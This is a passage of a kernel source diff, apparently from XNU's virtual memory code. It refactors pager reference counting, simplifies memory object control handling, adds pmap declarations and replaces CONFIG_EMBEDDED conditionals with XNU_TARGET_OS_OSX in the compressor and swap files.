 
 /*
@@ -666,7 +670,7 @@ vnode_pager_deallocate(
 
        vnode_object = vnode_pager_lookup(mem_obj);
 
-       if (os_ref_release(&vnode_object->ref_count) == 0) {
+       if (os_ref_release_raw(&vnode_object->vn_pgr_hdr_ref, NULL) == 0) {
                if (vnode_object->vnode_handle != NULL) {
                        vnode_pager_vrele(vnode_object->vnode_handle);
                }
@@ -920,7 +924,7 @@ vnode_object_create(
        vnode_object->vn_pgr_hdr.mo_pager_ops = &vnode_pager_ops;
        vnode_object->vn_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
-       os_ref_init(&vnode_object->ref_count, NULL);
+       os_ref_init_raw(&vnode_object->vn_pgr_hdr_ref, NULL);
        vnode_object->vnode_handle = vp;
 
        return vnode_object;
index 76e537501d969589080b3b88b6ec84a907888ee4..d5bbfecead2c352ecd3cd2fdd088bda8b4b72bfe 100644 (file)
@@ -93,13 +93,23 @@ typedef struct device_pager {
 
        /* pager-specific data */
        lck_mtx_t       lock;
-       struct os_refcnt ref_count;     /* reference count */
        device_port_t   device_handle;  /* device_handle */
        vm_size_t       size;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define dev_pgr_hdr_ref dev_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t dev_pgr_hdr_ref;
+#endif
        int             flags;
        boolean_t       is_mapped;
 } *device_pager_t;
 
+__header_always_inline os_ref_count_t
+device_pager_get_refcount(device_pager_t device_object)
+{
+       return os_ref_get_count_raw(&device_object->dev_pgr_hdr_ref);
+}
+
 LCK_GRP_DECLARE(device_pager_lck_grp, "device_pager");
 
 ZONE_DECLARE(device_pager_zone, "device node pager structures",
@@ -229,7 +239,7 @@ device_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &device_pager_ops);
        device_object = (device_pager_t)mem_obj;
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        return device_object;
 }
 
@@ -357,10 +367,10 @@ device_pager_reference(
        device_pager_t          device_object;
 
        device_object = device_pager_lookup(mem_obj);
-       os_ref_retain(&device_object->ref_count);
+       os_ref_retain_raw(&device_object->dev_pgr_hdr_ref, NULL);
        DTRACE_VM2(device_pager_reference,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 }
 
 /*
@@ -372,14 +382,15 @@ device_pager_deallocate(
 {
        device_pager_t          device_object;
        memory_object_control_t device_control;
+       os_ref_count_t          ref_count;
 
        device_object = device_pager_lookup(mem_obj);
 
        DTRACE_VM2(device_pager_deallocate,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 
-       os_ref_count_t ref_count = os_ref_release(&device_object->ref_count);
+       ref_count = os_ref_release_raw(&device_object->dev_pgr_hdr_ref, NULL);
 
        if (ref_count == 1) {
                /*
@@ -389,7 +400,7 @@ device_pager_deallocate(
 
                DTRACE_VM2(device_pager_destroy,
                    device_pager_t, device_object,
-                   unsigned int, os_ref_get_count(&device_object->ref_count));
+                   unsigned int, device_pager_get_refcount(device_object));
 
                assert(device_object->is_mapped == FALSE);
                if (device_object->device_handle != (device_port_t) NULL) {
@@ -404,8 +415,14 @@ device_pager_deallocate(
                 */
                DTRACE_VM2(device_pager_free,
                    device_pager_t, device_object,
-                   unsigned int, os_ref_get_count(&device_object->ref_count));
+                   unsigned int, device_pager_get_refcount(device_object));
 
+               device_control = device_object->dev_pgr_hdr.mo_control;
+
+               if (device_control != MEMORY_OBJECT_CONTROL_NULL) {
+                       memory_object_control_deallocate(device_control);
+                       device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
+               }
                device_pager_lock_destroy(device_object);
 
                zfree(device_pager_zone, device_object);
@@ -469,7 +486,7 @@ device_pager_map(
        device_object = device_pager_lookup(mem_obj);
 
        device_pager_lock(device_object);
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        if (device_object->is_mapped == FALSE) {
                /*
                 * First mapping of this pager: take an extra reference
@@ -494,7 +511,7 @@ device_pager_last_unmap(
        device_object = device_pager_lookup(mem_obj);
 
        device_pager_lock(device_object);
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        if (device_object->is_mapped) {
                device_object->is_mapped = FALSE;
                drop_ref = TRUE;
@@ -532,12 +549,12 @@ device_object_create(void)
        device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        device_pager_lock_init(device_object);
-       os_ref_init(&device_object->ref_count, NULL);
+       os_ref_init_raw(&device_object->dev_pgr_hdr_ref, NULL);
        device_object->is_mapped = FALSE;
 
        DTRACE_VM2(device_pager_create,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 
        return device_object;
 }
index 512efd04bea6e7055df839867b2af0e274ac0b91..d2b80278c51ebb3739cd138fde9e51e5d59535b6 100644 (file)
 #include "lz4_assembly_select.h"
 #include "lz4_constants.h"
 
+#if CONFIG_IO_COMPRESSION_STATS
+#include <string.h>
+#else
 #define memcpy __builtin_memcpy
+#endif
 
 #pragma mark - Building blocks
 
index 7fa63cc7a9c9ed7fb7fc3e63c9829167f685a881..a952e0d69b0c77d31ad64cbf4aa1a96b6ba75d5c 100644 (file)
@@ -1462,16 +1462,7 @@ memory_object_iopl_request(
                vm_object_reference(object);
                named_entry_unlock(named_entry);
        } else if (ip_kotype(port) == IKOT_MEM_OBJ_CONTROL) {
-               memory_object_control_t control;
-               control = (memory_object_control_t) port;
-               if (control == NULL) {
-                       return KERN_INVALID_ARGUMENT;
-               }
-               object = memory_object_control_to_vm_object(control);
-               if (object == VM_OBJECT_NULL) {
-                       return KERN_INVALID_ARGUMENT;
-               }
-               vm_object_reference(object);
+               panic("unexpected IKOT_MEM_OBJ_CONTROL: %p", port);
        } else {
                return KERN_INVALID_ARGUMENT;
        }
@@ -1638,8 +1629,6 @@ host_default_memory_manager(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        new_manager = *default_manager;
        lck_mtx_lock(&memory_manager_default_lock);
        current_manager = memory_manager_default;
@@ -2006,43 +1995,26 @@ memory_object_is_shared_cache(
        return object->object_is_shared_cache;
 }
 
-static ZONE_DECLARE(mem_obj_control_zone, "mem_obj_control",
-    sizeof(struct memory_object_control), ZC_NOENCRYPT);
-
 __private_extern__ memory_object_control_t
 memory_object_control_allocate(
        vm_object_t             object)
 {
-       memory_object_control_t control;
-
-       control = (memory_object_control_t)zalloc(mem_obj_control_zone);
-       if (control != MEMORY_OBJECT_CONTROL_NULL) {
-               control->moc_object = object;
-               control->moc_ikot = IKOT_MEM_OBJ_CONTROL; /* fake ip_kotype */
-       }
-       return control;
+       return object;
 }
 
 __private_extern__ void
 memory_object_control_collapse(
-       memory_object_control_t control,
+       memory_object_control_t *control,
        vm_object_t             object)
 {
-       assert((control->moc_object != VM_OBJECT_NULL) &&
-           (control->moc_object != object));
-       control->moc_object = object;
+       *control = object;
 }
 
 __private_extern__ vm_object_t
 memory_object_control_to_vm_object(
        memory_object_control_t control)
 {
-       if (control == MEMORY_OBJECT_CONTROL_NULL ||
-           control->moc_ikot != IKOT_MEM_OBJ_CONTROL) {
-               return VM_OBJECT_NULL;
-       }
-
-       return control->moc_object;
+       return control;
 }
 
 __private_extern__ vm_object_t
@@ -2090,17 +2062,16 @@ memory_object_control_reference(
  */
 void
 memory_object_control_deallocate(
-       memory_object_control_t control)
+       __unused memory_object_control_t control)
 {
-       zfree(mem_obj_control_zone, control);
 }
 
 void
 memory_object_control_disable(
-       memory_object_control_t control)
+       memory_object_control_t *control)
 {
-       assert(control->moc_object != VM_OBJECT_NULL);
-       control->moc_object = VM_OBJECT_NULL;
+       assert(*control != VM_OBJECT_NULL);
+       *control = VM_OBJECT_NULL;
 }
 
 void
index 930a660233285569286f6d95ba3d252ad037e70a..cb57eb469c75d5eb586bedb1775684744c089fbc 100644 (file)
@@ -80,7 +80,7 @@ memory_object_control_t memory_object_control_allocate(
 
 __private_extern__
 void                    memory_object_control_collapse(
-       memory_object_control_t control,
+       memory_object_control_t *control,
        vm_object_t             object);
 
 __private_extern__
@@ -95,7 +95,7 @@ mach_port_t             convert_mo_control_to_port(
        memory_object_control_t control);
 
 extern void memory_object_control_disable(
-       memory_object_control_t control);
+       memory_object_control_t *control);
 
 extern
 memory_object_control_t convert_port_to_mo_control(
index 63fee92d7ce83e0a28484e5f526a338ebf231751..d396d8f51f1f9bd76a6c54354cab69374b0bb65e 100644 (file)
@@ -138,6 +138,9 @@ extern void *pmap_steal_memory(vm_size_t size); /* Early memory allocation */
 extern void *pmap_steal_freeable_memory(vm_size_t size); /* Early memory allocation */
 
 extern uint_t pmap_free_pages(void); /* report remaining unused physical pages */
+#if defined(__arm__) || defined(__arm64__)
+extern uint_t pmap_free_pages_span(void); /* report phys address range of unused physical pages */
+#endif /* defined(__arm__) || defined(__arm64__) */
 
 extern void pmap_startup(vm_offset_t *startp, vm_offset_t *endp); /* allocate vm_page structs */
 
@@ -902,6 +905,9 @@ extern bool pmap_is_trust_cache_loaded(const uuid_t uuid);
 extern uint32_t pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]);
 extern bool pmap_lookup_in_loaded_trust_caches(const uint8_t cdhash[CS_CDHASH_LEN]);
 
+extern void pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]);
+extern bool pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]);
+
 extern bool pmap_in_ppl(void);
 
 extern void *pmap_claim_reserved_ppl_page(void);
@@ -911,6 +917,8 @@ extern void pmap_ledger_alloc_init(size_t);
 extern ledger_t pmap_ledger_alloc(void);
 extern void pmap_ledger_free(ledger_t);
 
+extern bool pmap_is_bad_ram(ppnum_t ppn);
+extern void pmap_retire_page(ppnum_t ppn);
 extern kern_return_t pmap_cs_allow_invalid(pmap_t pmap);
 
 #if __arm64__
index 17b667c2c2b3ef579e1bbe11e8d8ab2896163f1e..f7fcaceb38c4d418139a7d5883d1654833439f0c 100644 (file)
@@ -59,7 +59,6 @@
 #include <vm/vm_protos.h>
 #include <vm/vm_kern.h>
 
-
 /*
  * APPLE PROTECT MEMORY PAGER
  *
@@ -150,13 +149,18 @@ const struct memory_object_pager_ops apple_protect_pager_ops = {
  */
 typedef struct apple_protect_pager {
        /* mandatory generic header */
-       struct memory_object ap_pgr_hdr;
+       struct memory_object    ap_pgr_hdr;
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       struct os_refcnt        ref_count;      /* reference count */
-       boolean_t               is_ready;       /* is this pager ready ? */
-       boolean_t               is_mapped;      /* is this mem_obj mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define ap_pgr_hdr_ref          ap_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         ap_pgr_hdr_ref;      /* reference count */
+#endif
+       bool                    is_ready;       /* is this pager ready ? */
+       bool                    is_mapped;      /* is this mem_obj mapped ? */
+       bool                    is_cached;      /* is this pager cached ? */
        vm_object_t             backing_object; /* VM obj w/ encrypted data */
        vm_object_offset_t      backing_offset;
        vm_object_offset_t      crypto_backing_offset; /* for key... */
@@ -170,8 +174,8 @@ typedef struct apple_protect_pager {
  * List of memory objects managed by this EMM.
  * The list is protected by the "apple_protect_pager_lock" lock.
  */
-int apple_protect_pager_count = 0;              /* number of pagers */
-int apple_protect_pager_count_mapped = 0;       /* number of unmapped pagers */
+unsigned int apple_protect_pager_count = 0;        /* number of pagers */
+unsigned int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */
 queue_head_t apple_protect_pager_queue = QUEUE_HEAD_INITIALIZER(apple_protect_pager_queue);
 LCK_GRP_DECLARE(apple_protect_pager_lck_grp, "apple_protect");
 LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp);
@@ -179,15 +183,15 @@ LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp);
 /*
  * Maximum number of unmapped pagers we're willing to keep around.
  */
-int apple_protect_pager_cache_limit = 20;
+unsigned int apple_protect_pager_cache_limit = 20;
 
 /*
  * Statistics & counters.
  */
-int apple_protect_pager_count_max = 0;
-int apple_protect_pager_count_unmapped_max = 0;
-int apple_protect_pager_num_trim_max = 0;
-int apple_protect_pager_num_trim_total = 0;
+unsigned int apple_protect_pager_count_max = 0;
+unsigned int apple_protect_pager_count_unmapped_max = 0;
+unsigned int apple_protect_pager_num_trim_max = 0;
+unsigned int apple_protect_pager_num_trim_total = 0;
 
 
 
@@ -198,7 +202,8 @@ apple_protect_pager_t apple_protect_pager_create(
        vm_object_offset_t crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t crypto_start,
-       vm_object_offset_t crypto_end);
+       vm_object_offset_t crypto_end,
+       boolean_t cache_pager);
 apple_protect_pager_t apple_protect_pager_lookup(memory_object_t mem_obj);
 void apple_protect_pager_dequeue(apple_protect_pager_t pager);
 void apple_protect_pager_deallocate_internal(apple_protect_pager_t pager,
@@ -375,7 +380,7 @@ apple_protect_pager_data_request(
 
        pager = apple_protect_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(os_ref_get_count(&pager->ref_count) > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("apple_protect_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -402,7 +407,7 @@ apple_protect_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
        /*
@@ -743,7 +748,7 @@ apple_protect_pager_reference(
        pager = apple_protect_pager_lookup(mem_obj);
 
        lck_mtx_lock(&apple_protect_pager_lock);
-       os_ref_retain_locked(&pager->ref_count);
+       os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&apple_protect_pager_lock);
 }
 
@@ -824,7 +829,8 @@ apple_protect_pager_deallocate_internal(
        boolean_t               locked)
 {
        boolean_t       needs_trimming;
-       int             count_unmapped;
+       unsigned int    count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&apple_protect_pager_lock);
@@ -840,7 +846,7 @@ apple_protect_pager_deallocate_internal(
        }
 
        /* drop a reference on this pager */
-       os_ref_count_t ref_count = os_ref_release_locked(&pager->ref_count);
+       ref_count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
 
        if (ref_count == 1) {
                /*
@@ -943,7 +949,7 @@ apple_protect_pager_map(
 
        lck_mtx_lock(&apple_protect_pager_lock);
        assert(pager->is_ready);
-       assert(os_ref_get_count(&pager->ref_count) > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -951,7 +957,7 @@ apple_protect_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               os_ref_retain_locked(&pager->ref_count);
+               os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                apple_protect_pager_count_mapped++;
        }
        lck_mtx_unlock(&apple_protect_pager_lock);
@@ -969,7 +975,7 @@ apple_protect_pager_last_unmap(
        memory_object_t         mem_obj)
 {
        apple_protect_pager_t   pager;
-       int                     count_unmapped;
+       unsigned int            count_unmapped;
 
        PAGER_DEBUG(PAGER_ALL,
            ("apple_protect_pager_last_unmap: %p\n", mem_obj));
@@ -1029,7 +1035,7 @@ apple_protect_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &apple_protect_pager_ops);
        pager = (apple_protect_pager_t)(uintptr_t) mem_obj;
-       assert(os_ref_get_count(&pager->ref_count) > 0);
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -1040,7 +1046,8 @@ apple_protect_pager_create(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end)
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager)
 {
        apple_protect_pager_t   pager, pager2;
        memory_object_control_t control;
@@ -1064,8 +1071,16 @@ apple_protect_pager_create(
        pager->ap_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->is_ready = FALSE;/* not ready until it has a "name" */
-       os_ref_init_count(&pager->ref_count, NULL, 2); /* existence reference (for the cache) and another for the caller */
+       /* one reference for the caller */
+       os_ref_init_count_raw(&pager->ap_pgr_hdr_ref, NULL, 1);
        pager->is_mapped = FALSE;
+       if (cache_pager) {
+               /* extra reference for the cache */
+               os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
+               pager->is_cached = true;
+       } else {
+               pager->is_cached = false;
+       }
        pager->backing_object = backing_object;
        pager->backing_offset = backing_offset;
        pager->crypto_backing_offset = crypto_backing_offset;
@@ -1208,7 +1223,8 @@ apple_protect_pager_setup(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end)
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager)
 {
        apple_protect_pager_t   pager;
        struct pager_crypt_info *old_crypt_info, *new_crypt_info;
@@ -1295,7 +1311,7 @@ apple_protect_pager_setup(
                        crypt_info_deallocate(old_crypt_info);
                        assert(old_crypt_info->crypt_refcnt > 0);
                        /* give extra reference on pager to the caller */
-                       os_ref_retain_locked(&pager->ref_count);
+                       os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                        break;
                }
        }
@@ -1335,7 +1351,8 @@ apple_protect_pager_setup(
                                crypto_backing_offset,
                                new_crypt_info,
                                crypto_start,
-                               crypto_end);
+                               crypto_end,
+                               cache_pager);
                }
                if (pager == APPLE_PROTECT_PAGER_NULL) {
                        /* could not create a new pager */
@@ -1386,8 +1403,8 @@ apple_protect_pager_trim(void)
 {
        apple_protect_pager_t   pager, prev_pager;
        queue_head_t            trim_queue;
-       int                     num_trim;
-       int                     count_unmapped;
+       unsigned int            num_trim;
+       unsigned int            count_unmapped;
 
        lck_mtx_lock(&apple_protect_pager_lock);
 
@@ -1407,7 +1424,8 @@ apple_protect_pager_trim(void)
                prev_pager = (apple_protect_pager_t)
                    queue_prev(&pager->pager_queue);
 
-               if (os_ref_get_count(&pager->ref_count) == 2 &&
+               if (pager->is_cached &&
+                   os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) == 2 &&
                    pager->is_ready &&
                    !pager->is_mapped) {
                        /* this pager can be trimmed */
@@ -1441,6 +1459,8 @@ apple_protect_pager_trim(void)
                    pager,
                    apple_protect_pager_t,
                    pager_queue);
+               assert(pager->is_cached);
+               pager->is_cached = false;
                pager->pager_queue.next = NULL;
                pager->pager_queue.prev = NULL;
                /*
@@ -1448,7 +1468,8 @@ apple_protect_pager_trim(void)
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               os_ref_count_t __assert_only count = os_ref_release_locked(&pager->ref_count);
+               os_ref_count_t __assert_only count;
+               count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                assert(count == 1);
                apple_protect_pager_terminate_internal(pager);
        }
index 92a53eb22b3bcfea72e608e6518315fa17b6e546..315c8b429173900981277393e75256c411f3be3e 100644 (file)
@@ -118,7 +118,7 @@ boolean_t validate_c_segs = TRUE;
  * the boot-arg & device-tree code.
  */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #if CONFIG_FREEZE
 int     vm_compressor_mode = VM_PAGER_FREEZER_DEFAULT;
@@ -127,10 +127,10 @@ struct  freezer_context freezer_context_global;
 int     vm_compressor_mode = VM_PAGER_NOT_CONFIGURED;
 #endif /* CONFIG_FREEZE */
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 int             vm_compressor_mode = VM_PAGER_COMPRESSOR_WITH_SWAP;
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 TUNABLE(uint32_t, vm_compression_limit, "vm_compression_limit", 0);
 int             vm_compressor_is_active = 0;
@@ -344,9 +344,9 @@ static void vm_compressor_do_delayed_compactions(boolean_t);
 static void vm_compressor_compact_and_swap(boolean_t);
 static void vm_compressor_age_swapped_in_segments(boolean_t);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static void vm_compressor_take_paging_space_action(void);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 void compute_swapout_target_age(void);
 
@@ -481,7 +481,7 @@ vm_wants_task_throttled(task_t task)
 TUNABLE(bool, kill_on_no_paging_space, "-kill_on_no_paging_space", false);
 #endif /* DEVELOPMENT || DEBUG */
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 
 static uint32_t no_paging_space_action_in_progress = 0;
 extern void memorystatus_send_low_swap_note(void);
@@ -510,7 +510,7 @@ vm_compressor_take_paging_space_action(void)
                }
        }
 }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 void
@@ -623,12 +623,12 @@ vm_compressor_init(void)
 
        assert((C_SEGMENTS_PER_PAGE * sizeof(union c_segu)) == PAGE_SIZE);
 
-#ifdef CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        vm_compressor_minorcompact_threshold_divisor = 20;
        vm_compressor_majorcompact_threshold_divisor = 30;
        vm_compressor_unthrottle_threshold_divisor = 40;
        vm_compressor_catchup_threshold_divisor = 60;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        if (max_mem <= (3ULL * 1024ULL * 1024ULL * 1024ULL)) {
                vm_compressor_minorcompact_threshold_divisor = 11;
                vm_compressor_majorcompact_threshold_divisor = 13;
@@ -640,7 +640,7 @@ vm_compressor_init(void)
                vm_compressor_unthrottle_threshold_divisor = 35;
                vm_compressor_catchup_threshold_divisor = 50;
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        queue_init(&c_bad_list_head);
        queue_init(&c_age_list_head);
@@ -663,7 +663,7 @@ vm_compressor_init(void)
        compressor_pool_max_size = C_SEG_MAX_LIMIT;
        compressor_pool_max_size *= C_SEG_BUFSIZE;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 
        if (vm_compression_limit == 0) {
                if (max_mem <= (4ULL * 1024ULL * 1024ULL * 1024ULL)) {
@@ -1309,14 +1309,14 @@ c_seg_switch_state(c_segment_t c_seg, int new_state, boolean_t insert_head)
 {
        int     old_state = c_seg->c_state;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 #if     DEVELOPMENT || DEBUG
        if (new_state != C_IS_FILLING) {
                LCK_MTX_ASSERT(&c_seg->c_lock, LCK_MTX_ASSERT_OWNED);
        }
        LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED);
 #endif
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
        switch (old_state) {
        case C_IS_EMPTY:
                assert(new_state == C_IS_FILLING || new_state == C_IS_FREE);
@@ -2195,6 +2195,13 @@ compressor_needs_to_swap(void)
                        goto check_if_low_space;
                }
        }
+
+#if (XNU_TARGET_OS_OSX && __arm64__)
+       /*
+        * Thrashing detection disabled.
+        */
+#else /* (XNU_TARGET_OS_OSX && __arm64__) */
+
        compute_swapout_target_age();
 
        if (swapout_target_age) {
@@ -2219,6 +2226,7 @@ compressor_needs_to_swap(void)
        if (swapout_target_age) {
                should_swap = TRUE;
        }
+#endif /* (XNU_TARGET_OS_OSX && __arm64__) */
 
 check_if_low_space:
 
@@ -2504,9 +2512,9 @@ vm_compressor_do_delayed_compactions(boolean_t flush_all)
 
        VM_DEBUG_CONSTANT_EVENT(vm_compressor_do_delayed_compactions, VM_COMPRESSOR_DO_DELAYED_COMPACTIONS, DBG_FUNC_START, c_minor_count, flush_all, 0, 0);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED);
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        while (!queue_empty(&c_minor_list_head) && needs_to_swap == FALSE) {
                c_seg = (c_segment_t)queue_first(&c_minor_list_head);
@@ -3286,11 +3294,11 @@ c_seg_allocate(c_segment_t *current_chead)
        int             min_needed;
        int             size_to_populate;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (vm_compressor_low_on_space()) {
                vm_compressor_take_paging_space_action();
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        if ((c_seg = *current_chead) == NULL) {
                uint32_t        c_segno;
@@ -4465,11 +4473,11 @@ done:
                vm_swap_consider_defragmenting(VM_SWAP_FLAGS_NONE);
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        if ((c_minor_count && COMPRESSOR_NEEDS_TO_MINOR_COMPACT()) || vm_compressor_needs_to_major_compact()) {
                vm_wake_compactor_swapper();
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        return retval;
 }
index 9b4cf69ebe350ed06360be4ab70d34941a93960c..f7191c4571d446914ee04e361495cfa64f03ffff 100644 (file)
@@ -468,13 +468,13 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo
 #define VM_PAGE_COMPRESSOR_SWAP_CATCHUP_THRESHOLD       (((AVAILABLE_MEMORY) * 10) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 10))
 #define VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD      (((AVAILABLE_MEMORY) * 9) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 9))
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define AVAILABLE_NON_COMPRESSED_MIN                    20000
 #define COMPRESSOR_NEEDS_TO_SWAP()              (((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) || \
                                                  (AVAILABLE_NON_COMPRESSED_MEMORY < AVAILABLE_NON_COMPRESSED_MIN)) ? 1 : 0)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define COMPRESSOR_NEEDS_TO_SWAP()              ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) ? 1 : 0)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define HARD_THROTTLE_LIMIT_REACHED()           ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD) ? 1 : 0)
 #define SWAPPER_NEEDS_TO_UNTHROTTLE()           ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_UNTHROTTLE_THRESHOLD) ? 1 : 0)
@@ -484,11 +484,11 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo
 #define COMPRESSOR_NEEDS_TO_MINOR_COMPACT()     ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_COMPACT_THRESHOLD) ? 1 : 0)
 
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define COMPRESSOR_FREE_RESERVED_LIMIT          28
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define COMPRESSOR_FREE_RESERVED_LIMIT          128
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 uint32_t vm_compressor_get_encode_scratch_size(void) __pure2;
 uint32_t vm_compressor_get_decode_scratch_size(void) __pure2;
index 0c98c24a458327475b59eaa5e1ed37b810e3a3b6..01a41f9debc036996e0d23e0c72f05fbb6532d74 100644 (file)
@@ -127,7 +127,7 @@ extern int vnode_getwithref(struct vnode* vp);
 
 boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 /*
  * For CONFIG_FREEZE, we scale the c_segments_limit based on the
@@ -145,7 +145,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
                                         ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0)
 #define VM_SWAP_SHOULD_TRIM(swf)        ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define VM_MAX_SWAP_FILE_NUM            100
 #define VM_SWAPFILE_DELAYED_TRIM_MAX    128
@@ -156,7 +156,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
                                         ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0)
